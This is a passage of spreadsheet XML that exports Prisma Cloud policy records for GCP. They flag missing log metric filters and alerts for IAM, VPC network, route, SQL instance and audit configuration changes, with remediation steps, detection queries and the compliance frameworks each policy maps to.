          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2923" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2923" t="inlineStr"/>
      <c r="T2923" t="b">
        <v>0</v>
      </c>
      <c r="U2923" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2923" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2923" t="inlineStr">
        <is>
          <t>This policy identifies the GCP account which does not have a log metric filter and alert for Cloud Storage IAM permission changes. Monitoring Cloud Storage IAM permission activities will help in reducing time to detect and correct permissions on sensitive Cloud Storage bucket and objects inside the bucket. It is recommended to create a metric filter and alarm to detect activities related to the Cloud Storage IAM permission.</t>
        </is>
      </c>
      <c r="X2923" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
resource.type="gcs_bucket" AND protoPayload.methodName="storage.setIamPermissions"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3" t="inlineStr"/>
      <c r="Z2923" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '$.Y.conditions[*].metricThresholdFilter contains $.X.name and ($.X.filter contains "resource.type =" or $.X.filter contains "resource.type=") and ($.X.filter does not contain "resource.type !=" and $.X.filter does not contain "resource.type!=") and $.X.filter contains "gcs_bucket" and ($.X.filter contains "protoPayload.methodName=" or $.X.filter contains "protoPayload.methodName =") and ($.X.filter does not contain "protoPayload.methodName!=" and $.X.filter does not contain "protoPayload.methodName !=") and $.X.filter contains "storage.setIamPermissions"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2923" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2923" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2923" t="inlineStr">
        <is>
          <t>PC-GCP-MON-521</t>
        </is>
      </c>
      <c r="AD2923" t="b">
        <v>1</v>
      </c>
      <c r="AE2923" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2923" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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3" t="inlineStr">
        <is>
          <t>b7ee0045-ba97-40f2-acc9-7050dee8d1fb</t>
        </is>
      </c>
      <c r="AI2923" t="inlineStr">
        <is>
          <t>e775fe7b-13f3-455b-ab65-bba82d3ea2e3</t>
        </is>
      </c>
      <c r="AJ2923" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2923" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2924">
      <c r="A2924" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CIS v1.3.0 (GCP), MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, Telecommunications Security Act - TSA, CIS v1.0.0 (GCP), Fedramp (Moderate), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0, Telecommunications Security Act - TSA,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NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, CIS v1.1.0 (GCP), Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5,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Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Rehan, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, HITRUST CSF v.11.2.0, Fedramp (Low), NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013,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Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, CSA CCM v.4.0.1, CSA CCM v.4.0.6, ISO/IEC 27017:2015, CIS v1.2.0 (GCP),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CIS v2.0.0 (GCP) Level 2, CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, CIS v3.0.0 (GCP) Level 2, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2924" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2924" s="2" t="inlineStr"/>
      <c r="D2924" t="inlineStr"/>
      <c r="E2924" t="inlineStr"/>
      <c r="F2924" t="inlineStr"/>
      <c r="G2924" t="b">
        <v>0</v>
      </c>
      <c r="H29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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2924" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2924" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for VPC network changes</t>
        </is>
      </c>
      <c r="L2924" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2924" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2924" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2924" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2924" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2924" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2924" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2924" t="inlineStr"/>
      <c r="T2924" t="b">
        <v>0</v>
      </c>
      <c r="U2924" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2924" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2924" t="inlineStr">
        <is>
          <t>This policy identifies the GCP account which does not have a log metric filter and alert for VPC network changes. Monitoring network insertion, patching, deletion, removePeering and addPeering activities will help in identifying VPC traffic flow is not getting impacted. It is recommended to create a metric filter and alarm to detect activities related to the insertion, patching, deletion, removePeering and addPeering of VPC network.</t>
        </is>
      </c>
      <c r="X2924" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
resource.type="gce_network" AND jsonPayload.event_subtype="compute.networks.insert" OR jsonPayload.event_subtype="compute.networks.patch" OR jsonPayload.event_subtype="compute.networks.delete"  OR jsonPayload.event_subtype="compute.networks.removePeering" OR jsonPayload.event_subtype="compute.networks.addPeering"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4" t="inlineStr"/>
      <c r="Z2924" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '$.Y.conditions[*].metricThresholdFilter contains $.X.name and ($.X.filter contains "resource.type =" or $.X.filter contains "resource.type=") and ($.X.filter does not contain "resource.type !=" and $.X.filter does not contain "resource.type!=") and $.X.filter contains "gce_network" and ($.X.filter contains "jsonPayload.event_subtype=" or $.X.filter contains "jsonPayload.event_subtype =") and ($.X.filter does not contain "jsonPayload.event_subtype!=" and $.X.filter does not contain "jsonPayload.event_subtype !=") and $.X.filter contains "compute.networks.insert" and $.X.filter contains "compute.networks.patch" and $.X.filter contains "compute.networks.delete" and $.X.filter contains "compute.networks.removePeering" and $.X.filter contains "compute.networks.addPeering"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2924" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2924" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2924" t="inlineStr">
        <is>
          <t>PC-GCP-MON-520</t>
        </is>
      </c>
      <c r="AD2924" t="b">
        <v>1</v>
      </c>
      <c r="AE2924" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2924" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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4" t="inlineStr">
        <is>
          <t>877839bc-7edd-4c7c-a3f9-4525c17ba503</t>
        </is>
      </c>
      <c r="AI2924" t="inlineStr">
        <is>
          <t>ad5645c5-ebff-487f-9fb9-bf24daf45c65</t>
        </is>
      </c>
      <c r="AJ2924" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2924" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2925">
      <c r="A2925" t="inlineStr">
        <is>
          <t>Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, Risk Management in Technology (RMiT), Telecommunications Security Act - TSA, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, GDPR, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 1, Secure Controls Framework (SCF) - 2022.2.1, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2024.2, Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, CIS Controls v8.1, Secure Controls Framework (SCF) - 2022.2.1, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v1.2.0 (GCP), Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, HIPAA, Microsoft Cloud Security Benchmark v1, Secure Controls Framework (SCF) - 2024.2, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, DORA, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2925" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2925" s="2" t="inlineStr"/>
      <c r="D2925" t="inlineStr"/>
      <c r="E2925" t="inlineStr"/>
      <c r="F2925" t="inlineStr"/>
      <c r="G2925" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2925" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2925" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for VPC network route patch and insert</t>
        </is>
      </c>
      <c r="L2925" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2925" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2925" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2925" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2925" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2925" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R2925" t="inlineStr">
        <is>
          <t>A5.25</t>
        </is>
      </c>
      <c r="S2925" t="inlineStr"/>
      <c r="T2925" t="b">
        <v>0</v>
      </c>
      <c r="U2925" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2925" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2925" t="inlineStr">
        <is>
          <t>This policy identifies GCP accounts which do not have a log metric filter and alert for VPC network route patch and insert events. Monitoring network routes patching and insertion activities will help in identifying VPC traffic flows through an expected path. It is recommended to create a metric filter and alarm to detect activities related to the patch and insertion of VPC network routes.</t>
        </is>
      </c>
      <c r="X2925" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
resource.type="gce_route" AND protoPayload.methodName="beta.compute.routes.patch" OR protoPayload.methodName="beta.compute.routes.insert"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5" t="inlineStr"/>
      <c r="Z2925" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '$.Y.conditions[*].metricThresholdFilter contains $.X.name and ( $.X.filter contains "resource.type =" or $.X.filter contains "resource.type=" ) and ( $.X.filter does not contain "resource.type !=" and $.X.filter does not contain "resource.type!=" ) and $.X.filter contains "gce_route" and ( $.X.filter contains "protoPayload.methodName=" or $.X.filter contains "protoPayload.methodName =" ) and ( $.X.filter does not contain "protoPayload.methodName!=" and $.X.filter does not contain "protoPayload.methodName !=" ) and $.X.filter contains "beta.compute.routes.patch" and $.X.filter contains "beta.compute.routes.insert"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2925" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2925" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2925" t="inlineStr">
        <is>
          <t>PC-GCP-MON-939</t>
        </is>
      </c>
      <c r="AD2925" t="b">
        <v>1</v>
      </c>
      <c r="AE2925" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2925" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>abcc2be6-edc7-48bd-8ce9-c200c21f0192</t>
        </is>
      </c>
      <c r="AI2925" t="inlineStr">
        <is>
          <t>7c7e69c2-0ff3-4b69-91c6-a16a5445606a</t>
        </is>
      </c>
      <c r="AJ2925" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2925" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2926">
      <c r="A2926" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, Rehan, ISO/IEC 27002:2013, kfirdaus AWS Account-CS,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APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, CIS v1.2.0 (GCP), Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), CIS v1.1.0 (GCP), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, NIST 800-53 Rev 5, CIS v1.3.0 (GCP),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CIS v3.0.0 (GCP) Level 2, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, Fedramp (Moderate), NIST 800-53 Rev 5, NIST 800-53 Rev 5, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CIS v2.0.0 (GCP) Level 2, NIST 800-53 Rev4, ISO/IEC 27002:2013, CIS Controls v8.1, RBI Baseline Cyber Security and Resilience Requirements, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Fedramp (Low), NIST SP 800-171 Revision 3, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013,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CIS v1.0.0 (GCP), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4),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Fedramp (Moderate), NIST CSF, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2926" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2926" s="2" t="inlineStr"/>
      <c r="D2926" t="inlineStr"/>
      <c r="E2926" t="inlineStr"/>
      <c r="F2926" t="inlineStr"/>
      <c r="G2926" t="b">
        <v>0</v>
      </c>
      <c r="H29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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2926" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2926" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for SQL instance configuration changes</t>
        </is>
      </c>
      <c r="L2926" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2926" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2926" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2926" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2926" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2926" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2926" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2926" t="inlineStr"/>
      <c r="T2926" t="b">
        <v>0</v>
      </c>
      <c r="U2926" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2926" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2926" t="inlineStr">
        <is>
          <t>This policy identifies the GCP account which does not have a log metric filter and alert for SQL instance configuration changes. Monitoring SQL instance configuration activities will help in reducing time to detect and correct misconfigurations done on sql server. It is recommended to create a metric filter and alarm to detect activities related to the SQL instance configuration.</t>
        </is>
      </c>
      <c r="X2926" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
protoPayload.methodName="cloudsql.instances.update"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6" t="inlineStr"/>
      <c r="Z2926" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '$.Y.conditions[*].metricThresholdFilter contains $.X.name and ($.X.filter contains "protoPayload.methodName=" or $.X.filter contains "protoPayload.methodName =") and ($.X.filter does not contain "protoPayload.methodName!=" and $.X.filter does not contain "protoPayload.methodName !=") and $.X.filter contains "cloudsql.instances.update"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2926" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2926" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2926" t="inlineStr">
        <is>
          <t>PC-GCP-MON-522</t>
        </is>
      </c>
      <c r="AD2926" t="b">
        <v>1</v>
      </c>
      <c r="AE2926" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2926" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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6" t="inlineStr">
        <is>
          <t>7382ba83-f789-4b67-a6e9-d7e2895a9428</t>
        </is>
      </c>
      <c r="AI2926" t="inlineStr">
        <is>
          <t>2ecab679-f449-4bdb-940f-7f7f7c930389</t>
        </is>
      </c>
      <c r="AJ2926" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2926" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2927">
      <c r="A2927" t="inlineStr">
        <is>
          <t>jneytchev-fedramp-low, Sarbanes Oxley Act (SOX), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MPAA Content Protection Best Practices, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, TX-RAMP Level 2, Telecommunications Security Act - TSA, Fedramp (Moderate), Risk Management in Technology (RMiT), CSA CCM v.4.0.6, PCI DSS v4.0,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CIS v1.1.0 (GCP), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, MPAA Content Protection Best Practices, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, Copy of ACSC Information Security Manual (ISM)-clone, GDPR, ISO 27002:2022, CDC NIST 800-53 Rev4, CIS Controls v7.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.6, Copy of CIS Controls v8, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27017:2015, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, CIS v1.3.0 (GCP), NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CIS v1.2.0 (GCP), PCI DSS v4.0, TX-RAMP Level 1, Copy of New Zealand Information Security Manual (NZISM v3.4), NIST SP 800-171 Revision 3, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, NIST 800-53 Rev 5, CDC NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v.4.0.1, ISO/IEC 27017:2015, TX-RAMP Level 2, CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1,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HITRUST CSF v.11.2.0, Fedramp (Low), NIST SP 800-171 Revision 3, CSA CCM v4.0.12, ISO/IEC 27017:2015, Fedramp (Low), ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, jneytchev-fedramp-low, Demo_Daryl ACSC Information Security Manual (ISM), CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Risk Management in Technology (RMiT), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, ACSC Information Security Manual (ISM), NIST 800-53 Rev4, CRI Profile v2.0, CSA CCM v4.0.12, CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, Microsoft Cloud Security Benchmark v1,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NIST CSF, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Fedramp (Moderate), NIST CSF, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CSA CCM v4.0.12, NYDFS 23 CRR-NY 500.0, Rehan, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CSA CCM v4.0.12, ISO/IEC 27002:2013, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CSA CCM v4.0.12, PCI DSS v4.0, Matt's ATT&amp;ACK, CIS v2.0.0 (GCP) Level 1, CIS v3.0.0 (GCP) Level 1, ISO/IEC 27002:2013, DORA, Copy of ACSC Information Security Manual (ISM)-clone, ISO/IEC 27001:2022, CIS v1.0.0 (GCP), NIST SP 800-172, CSA CCM v.4.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27018:2019, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST CSF v2.0, ISO/IEC 27018:2019, NIST CSF, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2927" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2927" s="2" t="inlineStr"/>
      <c r="D2927" t="inlineStr"/>
      <c r="E2927" t="inlineStr"/>
      <c r="F2927" t="inlineStr"/>
      <c r="G2927" t="b">
        <v>0</v>
      </c>
      <c r="H29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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2927" t="inlineStr">
        <is>
          <t>gcloud-logging</t>
        </is>
      </c>
      <c r="K2927" t="inlineStr">
        <is>
          <t>GCP Log metric filter and alert does not exist for Audit Configuration Changes</t>
        </is>
      </c>
      <c r="L2927" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2927" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2927" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2927" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2927" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2927" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2927" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2927" t="inlineStr"/>
      <c r="T2927" t="b">
        <v>0</v>
      </c>
      <c r="U2927" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2927" t="inlineStr">
        <is>
          <t>gcloud-logging-metric</t>
        </is>
      </c>
      <c r="W2927" t="inlineStr">
        <is>
          <t>This policy identifies the GCP accounts which do not have a log metric filter and alert for Audit Configuration Changes. Configuring metric filter and alerts for Audit Configuration Changes ensures recommended state of audit configuration and hence, all the activities in project are audit-able at any point in time.</t>
        </is>
      </c>
      <c r="X2927" t="inlineStr">
        <is>
          <t>1. Sign in to GCP Console
2. Navigate to 'Logs-based metrics' under the 'Logging' section.
3. Click on 'CREATE METRIC'.
4. Provide 'Metric Type' and 'Details'.
5. In 'Filter selection', add filter as 
protoPayload.methodName="SetIamPolicy" AND protoPayload.serviceData.policyDelta.auditConfigDeltas:*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7" t="inlineStr"/>
      <c r="Z2927" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-logging-metric' as X; config from cloud.resource where api.name = 'gcloud-monitoring-policies-list' as Y; filter '($.Y.conditions[*].metricThresholdFilter contains $.X.name) and ($.X.filter contains "protoPayload.methodName =" or $.X.filter contains "protoPayload.methodName=") and ($.X.filter does not contain "protoPayload.methodName !=" and $.X.filter does not contain "protoPayload.methodName!=") and $.X.filter contains "SetIamPolicy" and $.X.filter contains "protoPayload.serviceData.policyDelta.auditConfigDeltas:*"'; show X; count(X) less than 1</t>
        </is>
      </c>
      <c r="AA2927" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2927" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2927" t="inlineStr">
        <is>
          <t>PC-GCP-MON-517</t>
        </is>
      </c>
      <c r="AD2927" t="b">
        <v>1</v>
      </c>
      <c r="AE2927" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2927" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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7" t="inlineStr">
        <is>
          <t>97e02fb4-29b6-4eea-8f15-b5d1c8f30dfd</t>
        </is>
      </c>
      <c r="AI2927" t="inlineStr">
        <is>
          <t>706f9645-466e-4c4b-9d6d-f822873b43ff</t>
        </is>
      </c>
      <c r="AJ2927" t="inlineStr">
        <is>
